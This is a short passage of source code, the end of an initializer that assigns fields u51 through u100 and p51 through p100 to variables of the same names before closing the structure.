			u51 = u51, p51 = p51,
			u52 = u52, p52 = p52,
			u53 = u53, p53 = p53,
			u54 = u54, p54 = p54,
			u55 = u55, p55 = p55,
			u56 = u56, p56 = p56,
			u57 = u57, p57 = p57,
			u58 = u58, p58 = p58,
			u59 = u59, p59 = p59,
			u60 = u60, p60 = p60,
			u61 = u61, p61 = p61,
			u62 = u62, p62 = p62,
			u63 = u63, p63 = p63,
			u64 = u64, p64 = p64,
			u65 = u65, p65 = p65,
			u66 = u66, p66 = p66,
			u67 = u67, p67 = p67,
			u68 = u68, p68 = p68,
			u69 = u69, p69 = p69,
			u70 = u70, p70 = p70,
			u71 = u71, p71 = p71,
			u72 = u72, p72 = p72,
			u73 = u73, p73 = p73,
			u74 = u74, p74 = p74,
			u75 = u75, p75 = p75,
			u76 = u76, p76 = p76,
			u77 = u77, p77 = p77,
			u78 = u78, p78 = p78,
			u79 = u79, p79 = p79,
			u80 = u80, p80 = p80,
			u81 = u81, p81 = p81,
			u82 = u82, p82 = p82,
			u83 = u83, p83 = p83,
			u84 = u84, p84 = p84,
			u85 = u85, p85 = p85,
			u86 = u86, p86 = p86,
			u87 = u87, p87 = p87,
			u88 = u88, p88 = p88,
			u89 = u89, p89 = p89,
			u90 = u90, p90 = p90,
			u91 = u91, p91 = p91,
			u92 = u92, p92 = p92,
			u93 = u93, p93 = p93,
			u94 = u94, p94 = p94,
			u95 = u95, p95 = p95,
			u96 = u96, p96 = p96,
			u97 = u97, p97 = p97,
			u98 = u98, p98 = p98,
			u99 = u99, p99 = p99,
			u100 = u100, p100 = p100
		];	
	
	}
	
}
